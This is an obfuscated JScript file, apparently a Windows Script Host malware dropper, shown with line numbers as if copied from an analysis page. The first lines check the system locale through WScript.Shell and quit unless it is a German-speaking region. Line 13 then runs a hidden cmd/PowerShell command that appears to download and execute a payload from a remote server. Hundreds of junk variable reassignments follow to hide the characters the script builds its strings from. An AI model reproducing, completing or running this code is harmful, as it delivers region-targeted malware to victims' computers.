1 | sgcuq = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var zrbnnbrt = this[evasuca + tulwwa + mzdzjteqq + iazmt + fgbgd + ccyttn + rnntfpyds + gfmjwnz] ( this[grmbsv + znlctzg + adtfhpl + mzdzjteqq + ujubxe + evasuca + gfmjwnz][ampffhnnd + mzdzjteqq + fgbgd + tulwwa + gfmjwnz + fgbgd + iwrwgbwou + pwjiiy + lqnjbqwzp + fgbgd + adtfhpl + gfmjwnz] ( grmbsv + znlctzg + adtfhpl + mzdzjteqq + ujubxe + evasuca + gfmjwnz + iqalou + znlctzg + xbtgyrs + fgbgd + jugynhn + jugynhn ) [fblkndq + fgbgd + bzwbeprd + fblkndq + fgbgd + tulwwa + orqjnyoqk] ( ylddfbm + dbcpintlc + efardpa + owguvq + ffjbuhdx + ampffhnnd + hiees + fblkndq + fblkndq + efardpa + tpbboxa + asxllce + ffjbuhdx + hiees + znlctzg + efardpa + fblkndq + qcklse + ampffhnnd + ndpum + rnntfpyds + gfmjwnz + mzdzjteqq + ndpum + jugynhn + vyiom + ptkssihw + tulwwa + rnntfpyds + fgbgd + jugynhn + qcklse + ccyttn + rnntfpyds + gfmjwnz + fgbgd + mzdzjteqq + rnntfpyds + tulwwa + gfmjwnz + ujubxe + ndpum + rnntfpyds + tulwwa + jugynhn + qcklse + ldogqln + ndpum + adtfhpl + tulwwa + jugynhn + fgbgd ), 16 ); |
|
3 | for ( fyaixew = 0 ; fyaixew < sgcuq[jugynhn + fgbgd + rnntfpyds + bzwbeprd + gfmjwnz + xbtgyrs] ; ++ fyaixew ) | |
4 | { | |
5 | if ( zrbnnbrt == sgcuq[fyaixew] ) | |
6 | { | |
7 | zrbnnbrt = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( zrbnnbrt !== true ) | |
12 | this[grmbsv + znlctzg + adtfhpl + mzdzjteqq + ujubxe + evasuca + gfmjwnz][omrvxwxe + orrfbvza + ujubxe + gfmjwnz] ( ); | |
13 | this[grmbsv + znlctzg + adtfhpl + mzdzjteqq + ujubxe + evasuca + gfmjwnz][ampffhnnd + mzdzjteqq + fgbgd + tulwwa + gfmjwnz + fgbgd + iwrwgbwou + pwjiiy + lqnjbqwzp + fgbgd + adtfhpl + gfmjwnz] ( grmbsv + znlctzg + adtfhpl + mzdzjteqq + ujubxe + evasuca + gfmjwnz + iqalou + znlctzg + xbtgyrs + fgbgd + jugynhn + jugynhn ) [mzdzjteqq + orrfbvza + rnntfpyds] ( adtfhpl + jjsky + orqjnyoqk + vyiom + elfypb + adtfhpl + vyiom + evasuca + ndpum + qvsovzcf + fgbgd + mzdzjteqq + iazmt + xbtgyrs + fgbgd + jugynhn + jugynhn + iqalou + fgbgd + zlfpyob + fgbgd + vyiom + jwtbjz + ampffhnnd + ndpum + jjsky + jjsky + tulwwa + rnntfpyds + orqjnyoqk + vyiom + pzwfrixv + ccyttn + rnntfpyds + kjyhq + ndpum + nkfixqv + fgbgd + jwtbjz + grmbsv + fgbgd + pwjiiy + fblkndq + fgbgd + klaslpkxi + orrfbvza + fgbgd + iazmt + gfmjwnz + vyiom + jwtbjz + iwrwgbwou + orrfbvza + gfmjwnz + lapurx + ujubxe + jugynhn + fgbgd + vyiom + goekdf + gfmjwnz + fgbgd + jjsky + evasuca + goekdf + qcklse + ujubxe + rnntfpyds + kjyhq + ndpum + ujubxe + adtfhpl + fgbgd + iqalou + evasuca + orqjnyoqk + delqpgdl + vyiom + xbtgyrs + gfmjwnz + gfmjwnz + evasuca + lohgcgoig + elfypb + elfypb + eqgce + vutlwrkt + fcmbjmc + iqalou + eqgce + opqsngfdr + fcmbjmc + iqalou + eqgce + iqalou + visjty + welxi + kkngwupc + elfypb + ujubxe + rnntfpyds + kjyhq + ndpum + ujubxe + adtfhpl + fgbgd + iqalou + evasuca + xbtgyrs + evasuca + pzwfrixv + pawkfjsjt + pawkfjsjt + iazmt + gfmjwnz + tulwwa + mzdzjteqq + gfmjwnz + vyiom + goekdf + gfmjwnz + fgbgd + jjsky + evasuca + goekdf + qcklse + ujubxe + rnntfpyds + kjyhq + ndpum + ujubxe + adtfhpl + fgbgd + iqalou + evasuca + orqjnyoqk + delqpgdl + pawkfjsjt + pawkfjsjt + adtfhpl + jjsky + orqjnyoqk + vyiom + elfypb + adtfhpl + vyiom + rnntfpyds + fgbgd + gfmjwnz + vyiom + orrfbvza + iazmt + fgbgd + vyiom + qcklse + qcklse + eqgce + vutlwrkt + fcmbjmc + iqalou + eqgce + opqsngfdr + fcmbjmc + iqalou + eqgce + iqalou + visjty + welxi + kkngwupc + shtugb + ltqrrx + ltqrrx + ltqrrx + ltqrrx + qcklse + orqjnyoqk + tulwwa + kjyhq + qvsovzcf + qvsovzcf + qvsovzcf + mzdzjteqq + ndpum + ndpum + gfmjwnz + qcklse + pawkfjsjt + pawkfjsjt + adtfhpl + jjsky + orqjnyoqk + vyiom + elfypb + adtfhpl + vyiom + mzdzjteqq + fgbgd + bzwbeprd + iazmt + kjyhq + mzdzjteqq + fcmbjmc + visjty + vyiom + elfypb + iazmt + vyiom + qcklse + qcklse + eqgce + vutlwrkt + fcmbjmc + iqalou + eqgce + opqsngfdr + fcmbjmc + iqalou + eqgce + iqalou + visjty + welxi + kkngwupc + shtugb + ltqrrx + ltqrrx + ltqrrx + ltqrrx + qcklse + orqjnyoqk + tulwwa + kjyhq + qvsovzcf + qvsovzcf + qvsovzcf + mzdzjteqq + ndpum + ndpum + gfmjwnz + qcklse + eqgce + visjty + mwpqfcbr + kkngwupc + iqufexvn + eqgce + fcmbjmc + visjty + fcmbjmc + welxi + kkngwupc + ltqrrx + visjty + eqgce + iqalou + orqjnyoqk + jugynhn + jugynhn, 0, false ); |
|
14 | } | |
15 | pzwfrixv = "X"; | |
16 | pzwfrixv = "f"; | |
17 | pzwfrixv = "R"; | |
18 | pzwfrixv = "D"; | |
19 | pzwfrixv = "Q"; | |
20 | pzwfrixv = "b"; | |
21 | pzwfrixv = "A"; | |
22 | pzwfrixv = "A"; | |
23 | pzwfrixv = "w"; | |
24 | pzwfrixv = "W"; | |
25 | pzwfrixv = "d"; | |
26 | pzwfrixv = "h"; | |
27 | pzwfrixv = "M"; | |
28 | pzwfrixv = "K"; | |
29 | pzwfrixv = "b"; | |
30 | pzwfrixv = "Y"; | |
31 | pzwfrixv = "f"; | |
32 | pzwfrixv = "c"; | |
33 | pzwfrixv = "b"; | |
34 | pzwfrixv = "e"; | |
35 | pzwfrixv = "x"; | |
36 | pzwfrixv = "b"; | |
37 | pzwfrixv = "k"; | |
38 | pzwfrixv = "j"; | |
39 | pzwfrixv = "t"; | |
40 | pzwfrixv = "G"; | |
41 | pzwfrixv = "n"; | |
42 | pzwfrixv = "i"; | |
43 | pzwfrixv = "Z"; | |
44 | pzwfrixv = "e"; | |
45 | pzwfrixv = "D"; | |
46 | pzwfrixv = "h"; | |
47 | pzwfrixv = "E"; | |
48 | pzwfrixv = "j"; | |
49 | pzwfrixv = "U"; | |
50 | pzwfrixv = "W"; | |
51 | pzwfrixv = "T"; | |
52 | pzwfrixv = "E"; | |
53 | pzwfrixv = "K"; | |
54 | pzwfrixv = "\""; | |
55 | fblkndq = "i"; | |
56 | fblkndq = "k"; | |
57 | fblkndq = "z"; | |
58 | fblkndq = "R"; | |
59 | pwjiiy = "n"; | |
60 | pwjiiy = "V"; | |
61 | pwjiiy = "G"; | |
62 | pwjiiy = "E"; | |
63 | pwjiiy = "w"; | |
64 | pwjiiy = "d"; | |
65 | pwjiiy = "Q"; | |
66 | pwjiiy = "b"; | |
67 | pwjiiy = "o"; | |
68 | pwjiiy = "v"; | |
69 | pwjiiy = "W"; | |
70 | pwjiiy = "R"; | |
71 | pwjiiy = "q"; | |
72 | pwjiiy = "I"; | |
73 | pwjiiy = "Q"; | |
74 | pwjiiy = "v"; | |
75 | pwjiiy = "v"; | |
76 | pwjiiy = "t"; | |
77 | pwjiiy = "q"; | |
78 | pwjiiy = "f"; | |
79 | pwjiiy = "G"; | |
80 | pwjiiy = "t"; | |
81 | pwjiiy = "X"; | |
82 | pwjiiy = "n"; | |
83 | pwjiiy = "S"; | |
84 | pwjiiy = "b"; | |
85 | goekdf = "z"; | |
86 | goekdf = "g"; | |
87 | goekdf = "B"; | |
88 | goekdf = "o"; | |
89 | goekdf = "e"; | |
90 | goekdf = "L"; | |
91 | goekdf = "u"; | |
92 | goekdf = "q"; | |
93 | goekdf = "r"; | |
94 | goekdf = "a"; | |
95 | goekdf = "J"; | |
96 | goekdf = "k"; | |
97 | goekdf = "x"; | |
98 | goekdf = "s"; | |
99 | goekdf = "w"; | |
100 | goekdf = "c"; | |
101 | goekdf = "S"; | |
102 | goekdf = "l"; | |
103 | goekdf = "D"; | |
104 | goekdf = "D"; | |
105 | goekdf = "S"; | |
106 | goekdf = "W"; | |
107 | goekdf = "s"; | |
108 | goekdf = "Q"; | |
109 | goekdf = "j"; | |
110 | goekdf = "%"; | |
111 | opqsngfdr = "m"; | |
112 | opqsngfdr = "d"; | |
113 | opqsngfdr = "r"; | |
114 | opqsngfdr = "a"; | |
115 | opqsngfdr = "x"; | |
116 | opqsngfdr = "b"; | |
117 | opqsngfdr = "C"; | |
118 | opqsngfdr = "F"; | |
119 | opqsngfdr = "G"; | |
120 | opqsngfdr = "R"; | |
121 | opqsngfdr = "o"; | |
122 | opqsngfdr = "Q"; | |
123 | opqsngfdr = "J"; | |
124 | opqsngfdr = "P"; | |
125 | opqsngfdr = "d"; | |
126 | opqsngfdr = "o"; | |
127 | opqsngfdr = "G"; | |
128 | opqsngfdr = "Z"; | |
129 | opqsngfdr = "z"; | |
130 | opqsngfdr = "n"; | |
131 | opqsngfdr = "t"; | |
132 | opqsngfdr = "O"; | |
133 | opqsngfdr = "A"; | |
134 | opqsngfdr = "Q"; | |
135 | opqsngfdr = "Q"; | |
136 | opqsngfdr = "4"; | |
137 | jugynhn = "l"; | |
138 | ptkssihw = "T"; | |
139 | ptkssihw = "G"; | |
140 | ptkssihw = "C"; | |
141 | ptkssihw = "m"; | |
142 | ptkssihw = "o"; | |
143 | ptkssihw = "f"; | |
144 | ptkssihw = "G"; | |
145 | ptkssihw = "s"; | |
146 | ptkssihw = "G"; | |
147 | ptkssihw = "i"; | |
148 | ptkssihw = "o"; | |
149 | ptkssihw = "A"; | |
150 | ptkssihw = "j"; | |
151 | ptkssihw = "E"; | |
152 | ptkssihw = "c"; | |
153 | ptkssihw = "o"; | |
154 | ptkssihw = "N"; | |
155 | ptkssihw = "l"; | |
156 | ptkssihw = "V"; | |
157 | ptkssihw = "v"; | |
158 | ptkssihw = "F"; | |
159 | ptkssihw = "g"; | |
160 | ptkssihw = "I"; | |
161 | ptkssihw = "q"; | |
162 | ptkssihw = "v"; | |
163 | ptkssihw = "z"; | |
164 | ptkssihw = "x"; | |
165 | ptkssihw = "i"; | |
166 | ptkssihw = "b"; | |
167 | ptkssihw = "f"; | |
168 | ptkssihw = "y"; | |
169 | ptkssihw = "C"; | |
170 | ptkssihw = "R"; | |
171 | ptkssihw = "A"; | |
172 | ptkssihw = "w"; | |
173 | ptkssihw = "j"; | |
174 | ptkssihw = "I"; | |
175 | ptkssihw = "V"; | |
176 | ptkssihw = "p"; | |
177 | ptkssihw = "g"; | |
178 | ptkssihw = "q"; | |
179 | ptkssihw = "g"; | |
180 | ptkssihw = "P"; | |
181 | kkngwupc = "l"; | |
182 | kkngwupc = "i"; | |
183 | kkngwupc = "v"; | |
184 | kkngwupc = "B"; | |
185 | kkngwupc = "X"; | |
186 | kkngwupc = "G"; | |
187 | kkngwupc = "K"; | |
188 | kkngwupc = "i"; | |
189 | kkngwupc = "x"; | |
190 | kkngwupc = "U"; | |
191 | kkngwupc = "n"; | |
192 | kkngwupc = "F"; | |
193 | kkngwupc = "X"; | |
194 | kkngwupc = "h"; | |
195 | kkngwupc = "d"; | |
196 | kkngwupc = "O"; | |
197 | kkngwupc = "Y"; | |
198 | kkngwupc = "U"; | |
199 | kkngwupc = "p"; | |
200 | kkngwupc = "k"; | |
201 | kkngwupc = "R"; | |
202 | kkngwupc = "Z"; | |
203 | kkngwupc = "i"; | |
204 | kkngwupc = "B"; | |
205 | kkngwupc = "A"; | |
206 | kkngwupc = "u"; | |
207 | kkngwupc = "G"; | |
208 | kkngwupc = "c"; | |
209 | kkngwupc = "N"; | |
210 | kkngwupc = "W"; | |
211 | kkngwupc = "X"; | |
212 | kkngwupc = "m"; | |
213 | kkngwupc = "N"; | |
214 | kkngwupc = "C"; | |
215 | kkngwupc = "n"; | |
216 | kkngwupc = "u"; | |
217 | kkngwupc = "i"; | |
218 | kkngwupc = "b"; | |
219 | kkngwupc = "5"; | |
220 | ccyttn = "U"; | |
221 | ccyttn = "K"; | |
222 | ccyttn = "D"; | |
223 | ccyttn = "t"; | |
224 | ccyttn = "O"; | |
225 | ccyttn = "m"; | |
226 | ccyttn = "g"; | |
227 | ccyttn = "L"; | |
228 | ccyttn = "v"; | |
229 | ccyttn = "n"; | |
230 | ccyttn = "j"; | |
231 | ccyttn = "x"; | |
232 | ccyttn = "e"; | |
233 | ccyttn = "d"; | |
234 | ccyttn = "n"; | |
235 | ccyttn = "A"; | |
236 | ccyttn = "J"; | |
237 | ccyttn = "q"; | |
238 | ccyttn = "v"; | |
239 | ccyttn = "n"; | |
240 | ccyttn = "N"; | |
241 | ccyttn = "w"; | |
242 | ccyttn = "P"; | |
243 | ccyttn = "t"; | |
244 | ccyttn = "Y"; | |
245 | ccyttn = "Y"; | |
246 | ccyttn = "T"; | |
247 | ccyttn = "F"; | |
248 | ccyttn = "O"; | |
249 | ccyttn = "y"; | |
250 | ccyttn = "W"; | |
251 | ccyttn = "o"; | |
252 | ccyttn = "B"; | |
253 | ccyttn = "n"; | |
254 | ccyttn = "M"; | |
255 | ccyttn = "u"; | |
256 | ccyttn = "N"; | |
257 | ccyttn = "B"; | |
258 | ccyttn = "v"; | |
259 | ccyttn = "l"; | |
260 | ccyttn = "T"; | |
261 | ccyttn = "y"; | |
262 | ccyttn = "I"; | |
263 | qvsovzcf = "k"; | |
264 | qvsovzcf = "b"; | |
265 | qvsovzcf = "e"; | |
266 | qvsovzcf = "m"; | |
267 | qvsovzcf = "I"; | |
268 | qvsovzcf = "i"; | |
269 | qvsovzcf = "g"; | |
270 | qvsovzcf = "Y"; | |
271 | qvsovzcf = "o"; | |
272 | qvsovzcf = "e"; | |
273 | qvsovzcf = "H"; | |
274 | qvsovzcf = "n"; | |
275 | qvsovzcf = "E"; | |
276 | qvsovzcf = "Q"; | |
277 | qvsovzcf = "N"; | |
278 | qvsovzcf = "c"; | |
279 | qvsovzcf = "Y"; | |
280 | qvsovzcf = "B"; | |
281 | qvsovzcf = "T"; | |
282 | qvsovzcf = "l"; | |
283 | qvsovzcf = "G"; | |
284 | qvsovzcf = "h"; | |
285 | qvsovzcf = "l"; | |
286 | qvsovzcf = "Q"; | |
287 | qvsovzcf = "v"; | |
288 | qvsovzcf = "g"; | |
289 | qvsovzcf = "I"; | |
290 | qvsovzcf = "n"; | |
291 | qvsovzcf = "K"; | |
292 | qvsovzcf = "f"; | |
293 | qvsovzcf = "w"; | |
294 | lqnjbqwzp = "z"; | |
295 | lqnjbqwzp = "g"; | |
296 | lqnjbqwzp = "M"; | |
297 | lqnjbqwzp = "X"; | |
298 | lqnjbqwzp = "E"; | |
299 | lqnjbqwzp = "l"; | |
300 | lqnjbqwzp = "g"; | |
301 | lqnjbqwzp = "x"; | |
302 | lqnjbqwzp = "z"; | |
303 | lqnjbqwzp = "j"; | |
304 | lqnjbqwzp = "D"; | |
305 | lqnjbqwzp = "d"; | |
306 | lqnjbqwzp = "j"; | |
307 | fgbgd = "o"; | |
308 | fgbgd = "S"; | |
309 | fgbgd = "p"; | |
310 | fgbgd = "d"; | |
311 | fgbgd = "e"; | |
312 | fgbgd = "A"; | |
313 | fgbgd = "N"; | |
314 | fgbgd = "r"; | |
315 | fgbgd = "P"; | |
316 | fgbgd = "f"; | |
317 | fgbgd = "Z"; | |
318 | fgbgd = "x"; | |
319 | fgbgd = "T"; | |
320 | fgbgd = "h"; | |
321 | fgbgd = "M"; | |
322 | fgbgd = "H"; | |
323 | fgbgd = "G"; | |
324 | fgbgd = "r"; | |
325 | fgbgd = "C"; | |
326 | fgbgd = "u"; | |
327 | fgbgd = "V"; | |
328 | fgbgd = "C"; | |
329 | fgbgd = "a"; | |
330 | fgbgd = "s"; | |
331 | fgbgd = "B"; | |
332 | fgbgd = "s"; | |
333 | fgbgd = "w"; | |
334 | fgbgd = "M"; | |
335 | fgbgd = "J"; | |
336 | fgbgd = "c"; | |
337 | fgbgd = "z"; | |
338 | fgbgd = "X"; | |
339 | fgbgd = "t"; | |
340 | fgbgd = "a"; | |
341 | fgbgd = "c"; | |
342 | fgbgd = "e"; | |
343 | znlctzg = "o"; | |
344 | znlctzg = "Y"; | |
345 | znlctzg = "y"; | |
346 | znlctzg = "o"; | |
347 | znlctzg = "h"; | |
348 | znlctzg = "x"; | |
349 | znlctzg = "m"; | |
350 | znlctzg = "t"; | |
351 | znlctzg = "U"; | |
352 | znlctzg = "C"; | |
353 | znlctzg = "i"; | |
354 | znlctzg = "j"; | |
355 | znlctzg = "y"; | |
356 | znlctzg = "n"; | |
357 | znlctzg = "s"; | |
358 | znlctzg = "u"; | |
359 | znlctzg = "I"; | |
360 | znlctzg = "T"; | |
361 | znlctzg = "X"; | |
362 | znlctzg = "E"; | |
363 | znlctzg = "C"; | |
364 | znlctzg = "l"; | |
365 | znlctzg = "h"; | |
366 | znlctzg = "g"; | |
367 | znlctzg = "f"; | |
368 | znlctzg = "A"; | |
369 | znlctzg = "s"; | |
370 | znlctzg = "v"; | |
371 | znlctzg = "J"; | |
372 | znlctzg = "P"; | |
373 | znlctzg = "y"; | |
374 | znlctzg = "K"; | |
375 | znlctzg = "S"; | |
376 | znlctzg = "f"; | |
377 | znlctzg = "T"; | |
378 | znlctzg = "F"; | |
379 | znlctzg = "k"; | |
380 | znlctzg = "V"; | |
381 | znlctzg = "g"; | |
382 | znlctzg = "g"; | |
383 | znlctzg = "V"; | |
384 | znlctzg = "S"; | |
385 | ltqrrx = "B"; | |
386 | ltqrrx = "k"; | |
387 | ltqrrx = "r"; | |
388 | ltqrrx = "Z"; | |
389 | ltqrrx = "8"; | |
390 | lapurx = "E"; | |
391 | lapurx = "t"; | |
392 | lapurx = "u"; | |
393 | lapurx = "z"; | |
394 | lapurx = "R"; | |
395 | lapurx = "y"; | |
396 | lapurx = "y"; | |
397 | lapurx = "w"; | |
398 | lapurx = "W"; | |
399 | lapurx = "A"; | |
400 | lapurx = "s"; | |
401 | lapurx = "U"; | |
402 | lapurx = "p"; | |
403 | lapurx = "u"; | |
404 | lapurx = "r"; | |
405 | lapurx = "c"; | |
406 | lapurx = "u"; | |
407 | lapurx = "f"; | |
408 | lapurx = "M"; | |
409 | lapurx = "D"; | |
410 | lapurx = "P"; | |
411 | lapurx = "V"; | |
412 | lapurx = "k"; | |
413 | lapurx = "Y"; | |
414 | lapurx = "K"; | |
415 | lapurx = "a"; | |
416 | lapurx = "F"; | |
417 | lapurx = "U"; | |
418 | lapurx = "n"; | |
419 | lapurx = "n"; | |
420 | lapurx = "p"; | |
421 | lapurx = "Z"; | |
422 | lapurx = "z"; | |
423 | lapurx = "v"; | |
424 | lapurx = "k"; | |
425 | lapurx = "q"; | |
426 | lapurx = "z"; | |
427 | lapurx = "F"; | |
428 | owguvq = "v"; | |
429 | owguvq = "F"; | |
430 | owguvq = "L"; | |
431 | owguvq = "j"; | |
432 | owguvq = "E"; | |
433 | owguvq = "h"; | |
434 | owguvq = "S"; | |
435 | owguvq = "D"; | |
436 | owguvq = "Q"; | |
437 | owguvq = "k"; | |
438 | owguvq = "k"; | |
439 | owguvq = "K"; | |
440 | owguvq = "i"; | |
441 | owguvq = "B"; | |
442 | owguvq = "h"; | |
443 | owguvq = "O"; | |
444 | owguvq = "r"; | |
445 | owguvq = "M"; | |
446 | owguvq = "K"; | |
447 | owguvq = "o"; | |
448 | owguvq = "m"; | |
449 | owguvq = "y"; | |
450 | owguvq = "s"; | |
451 | owguvq = "p"; | |
452 | owguvq = "Z"; | |
453 | owguvq = "P"; | |
454 | owguvq = "O"; | |
455 | owguvq = "S"; | |
456 | owguvq = "F"; | |
457 | owguvq = "L"; | |
458 | owguvq = "y"; | |
459 | owguvq = "d"; | |
460 | owguvq = "a"; | |
461 | owguvq = "Y"; | |
462 | klaslpkxi = "e"; | |
463 | klaslpkxi = "T"; | |
464 | klaslpkxi = "W"; | |
465 | klaslpkxi = "H"; | |
466 | klaslpkxi = "O"; | |
467 | klaslpkxi = "I"; | |
468 | klaslpkxi = "J"; | |
469 | klaslpkxi = "L"; | |
470 | klaslpkxi = "a"; | |
471 | klaslpkxi = "n"; | |
472 | klaslpkxi = "t"; | |
473 | klaslpkxi = "k"; | |
474 | klaslpkxi = "T"; | |
475 | klaslpkxi = "R"; | |
476 | klaslpkxi = "P"; | |
477 | klaslpkxi = "L"; | |
478 | klaslpkxi = "i"; | |
479 | klaslpkxi = "t"; | |
480 | klaslpkxi = "S"; | |
481 | klaslpkxi = "q"; | |
482 | tulwwa = "F"; | |
483 | tulwwa = "L"; | |
484 | tulwwa = "g"; | |
485 | tulwwa = "g"; | |
486 | tulwwa = "A"; | |
487 | tulwwa = "e"; | |
488 | tulwwa = "U"; | |
489 | tulwwa = "Q"; | |
490 | tulwwa = "a"; | |
491 | iqalou = "r"; | |
492 | iqalou = "J"; | |
493 | iqalou = "y"; | |
494 | iqalou = "Y"; | |
495 | iqalou = "n"; | |
496 | iqalou = "L"; | |
497 | iqalou = "V"; | |
498 | iqalou = "Q"; | |
499 | iqalou = "z"; | |
500 | iqalou = "b"; | |
501 | iqalou = "v"; | |
502 | iqalou = "s"; | |
503 | iqalou = "Y"; | |
504 | iqalou = "b"; | |
505 | iqalou = "g"; | |
506 | iqalou = "r"; | |
507 | iqalou = "N"; | |
508 | iqalou = "P"; | |
509 | iqalou = "b"; | |
510 | iqalou = "V"; | |
511 | iqalou = "q"; | |
512 | iqalou = "F"; | |
513 | iqalou = "S"; | |
514 | iqalou = "Z"; | |
515 | iqalou = "V"; | |
516 | iqalou = "H"; | |
517 | iqalou = "O"; | |
518 | iqalou = "t"; | |
519 | iqalou = "N"; | |
520 | iqalou = "X"; | |
521 | iqalou = "J"; | |
522 | iqalou = "t"; | |
523 | iqalou = "n"; | |
524 | iqalou = "Z"; | |
525 | iqalou = "X"; | |
526 | iqalou = "c"; | |
527 | iqalou = "A"; | |
528 | iqalou = "u"; | |
529 | iqalou = "X"; | |
530 | iqalou = "p"; | |
531 | iqalou = "p"; | |
532 | iqalou = "j"; | |
533 | iqalou = "."; | |
534 | orqjnyoqk = "F"; | |
535 | orqjnyoqk = "F"; | |
536 | orqjnyoqk = "x"; | |
537 | orqjnyoqk = "w"; | |
538 | orqjnyoqk = "T"; | |
539 | orqjnyoqk = "m"; | |
540 | orqjnyoqk = "e"; | |
541 | orqjnyoqk = "o"; | |
542 | orqjnyoqk = "Q"; | |
543 | orqjnyoqk = "v"; | |
544 | orqjnyoqk = "g"; | |
545 | orqjnyoqk = "X"; | |
546 | orqjnyoqk = "M"; | |
547 | orqjnyoqk = "h"; | |
548 | orqjnyoqk = "F"; | |
549 | orqjnyoqk = "x"; | |
550 | orqjnyoqk = "T"; | |
551 | orqjnyoqk = "d"; | |
552 | orqjnyoqk = "R"; | |
553 | orqjnyoqk = "O"; | |
554 | orqjnyoqk = "J"; | |
555 | orqjnyoqk = "i"; | |
556 | orqjnyoqk = "c"; | |
557 | orqjnyoqk = "P"; | |
558 | orqjnyoqk = "d"; | |
559 | lohgcgoig = "F"; | |
560 | lohgcgoig = "L"; | |
561 | lohgcgoig = "n"; | |
562 | lohgcgoig = "B"; | |
563 | lohgcgoig = "Q"; | |
564 | lohgcgoig = ":"; | |
565 | kjyhq = "X"; | |
566 | kjyhq = "n"; | |
567 | kjyhq = "f"; | |
568 | kjyhq = "D"; | |
569 | kjyhq = "K"; | |
570 | kjyhq = "y"; | |
571 | kjyhq = "C"; | |
572 | kjyhq = "Z"; | |
573 | kjyhq = "l"; | |
574 | kjyhq = "O"; | |
575 | kjyhq = "I"; | |
576 | kjyhq = "F"; | |
577 | kjyhq = "G"; | |
578 | kjyhq = "y"; | |
579 | kjyhq = "N"; | |
580 | kjyhq = "p"; | |
581 | kjyhq = "d"; | |
582 | kjyhq = "V"; | |
583 | kjyhq = "f"; | |
584 | kjyhq = "q"; | |
585 | kjyhq = "v"; | |
586 | ffjbuhdx = "p"; | |
587 | ffjbuhdx = "k"; | |
588 | ffjbuhdx = "D"; | |
589 | ffjbuhdx = "M"; | |
590 | ffjbuhdx = "Y"; | |
591 | ffjbuhdx = "k"; | |
592 | ffjbuhdx = "h"; | |
593 | ffjbuhdx = "_"; | |
594 | ldogqln = "O"; | |
595 | ldogqln = "g"; | |
596 | ldogqln = "k"; | |
597 | ldogqln = "a"; | |
598 | ldogqln = "w"; | |
599 | ldogqln = "O"; | |
600 | ldogqln = "k"; | |
601 | ldogqln = "M"; | |
602 | ldogqln = "N"; | |
603 | ldogqln = "x"; | |
604 | ldogqln = "O"; | |
605 | ldogqln = "H"; | |
606 | ldogqln = "z"; | |
607 | ldogqln = "t"; | |
608 | ldogqln = "h"; | |
609 | ldogqln = "m"; | |
610 | ldogqln = "E"; | |
611 | ldogqln = "o"; | |
612 | ldogqln = "N"; | |
613 | ldogqln = "i"; | |
614 | ldogqln = "L"; | |
615 | omrvxwxe = "U"; | |
616 | omrvxwxe = "t"; | |
617 | omrvxwxe = "Y"; | |
618 | omrvxwxe = "J"; | |
619 | omrvxwxe = "C"; | |
620 | omrvxwxe = "D"; | |
621 | omrvxwxe = "v"; | |
622 | omrvxwxe = "P"; | |
623 | omrvxwxe = "Q"; | |
624 | omrvxwxe = "e"; | |
625 | omrvxwxe = "h"; | |
626 | omrvxwxe = "A"; | |
627 | omrvxwxe = "o"; | |
628 | omrvxwxe = "Y"; | |
629 | omrvxwxe = "T"; | |
630 | omrvxwxe = "m"; | |
631 | omrvxwxe = "s"; | |
632 | omrvxwxe = "f"; | |
633 | omrvxwxe = "p"; | |
634 | omrvxwxe = "e"; | |
635 | omrvxwxe = "T"; | |
636 | omrvxwxe = "L"; | |
637 | omrvxwxe = "V"; | |
638 | omrvxwxe = "z"; | |
639 | omrvxwxe = "h"; | |
640 | omrvxwxe = "B"; | |
641 | omrvxwxe = "L"; | |
642 | omrvxwxe = "K"; | |
643 | omrvxwxe = "u"; | |
644 | omrvxwxe = "n"; | |
645 | omrvxwxe = "W"; | |
646 | omrvxwxe = "f"; | |
647 | omrvxwxe = "A"; | |
648 | omrvxwxe = "w"; | |
649 | omrvxwxe = "P"; | |
650 | omrvxwxe = "d"; | |
651 | omrvxwxe = "M"; | |
652 | omrvxwxe = "g"; | |
653 | omrvxwxe = "T"; | |
654 | omrvxwxe = "x"; | |
655 | omrvxwxe = "Q"; | |
656 | vyiom = "V"; | |
657 | vyiom = "B"; | |
658 | vyiom = "B"; | |
659 | vyiom = "D"; | |
660 | vyiom = "O"; | |
661 | vyiom = "K"; | |
662 | vyiom = "r"; | |
663 | vyiom = "h"; | |
664 | vyiom = "m"; | |
665 | vyiom = "l"; | |
666 | vyiom = "W"; | |
667 | vyiom = "U"; | |
668 | vyiom = "C"; | |
669 | vyiom = "L"; | |
670 | vyiom = "I"; | |
671 | vyiom = "j"; | |
672 | vyiom = "V"; | |
673 | vyiom = "Z"; | |
674 | vyiom = "I"; | |
675 | vyiom = "Q"; | |
676 | vyiom = "a"; | |
677 | vyiom = "c"; | |
678 | vyiom = "k"; | |
679 | vyiom = "x"; | |
680 | vyiom = " "; | |
681 | iazmt = "J"; | |
682 | iazmt = "U"; | |
683 | iazmt = "a"; | |
684 | iazmt = "E"; | |
685 | iazmt = "y"; | |
686 | iazmt = "p"; | |
687 | iazmt = "w"; | |
688 | iazmt = "E"; | |
689 | iazmt = "E"; | |
690 | iazmt = "Q"; | |
691 | iazmt = "U"; | |
692 | iazmt = "B"; | |
693 | iazmt = "M"; | |
694 | iazmt = "i"; | |
695 | iazmt = "E"; | |
696 | iazmt = "g"; | |
697 | iazmt = "s"; | |
698 | ndpum = "W"; | |
699 | ndpum = "r"; | |
700 | ndpum = "L"; | |
701 | ndpum = "j"; | |
702 | ndpum = "y"; | |
703 | ndpum = "k"; | |
704 | ndpum = "S"; | |
705 | ndpum = "T"; | |
706 | ndpum = "g"; | |
707 | ndpum = "w"; | |
708 | ndpum = "l"; | |
709 | ndpum = "I"; | |
710 | ndpum = "B"; | |
711 | ndpum = "z"; | |
712 | ndpum = "C"; | |
713 | ndpum = "K"; | |
714 | ndpum = "S"; | |
715 | ndpum = "U"; | |
716 | ndpum = "V"; | |
717 | ndpum = "F"; | |
718 | ndpum = "Q"; | |
719 | ndpum = "R"; | |
720 | ndpum = "U"; | |
721 | ndpum = "K"; | |
722 | ndpum = "F"; | |
723 | ndpum = "A"; | |
724 | ndpum = "S"; | |
725 | ndpum = "S"; | |
726 | ndpum = "Y"; | |
727 | ndpum = "b"; | |
728 | ndpum = "K"; | |
729 | ndpum = "W"; | |
730 | ndpum = "b"; | |
731 | ndpum = "p"; | |
732 | ndpum = "v"; | |
733 | ndpum = "l"; | |
734 | ndpum = "h"; | |
735 | ndpum = "w"; | |
736 | ndpum = "q"; | |
737 | ndpum = "g"; | |
738 | ndpum = "m"; | |
739 | ndpum = "g"; | |
740 | ndpum = "o"; | |
741 | welxi = "b"; | |
742 | welxi = "p"; | |
743 | welxi = "u"; | |
744 | welxi = "a"; | |
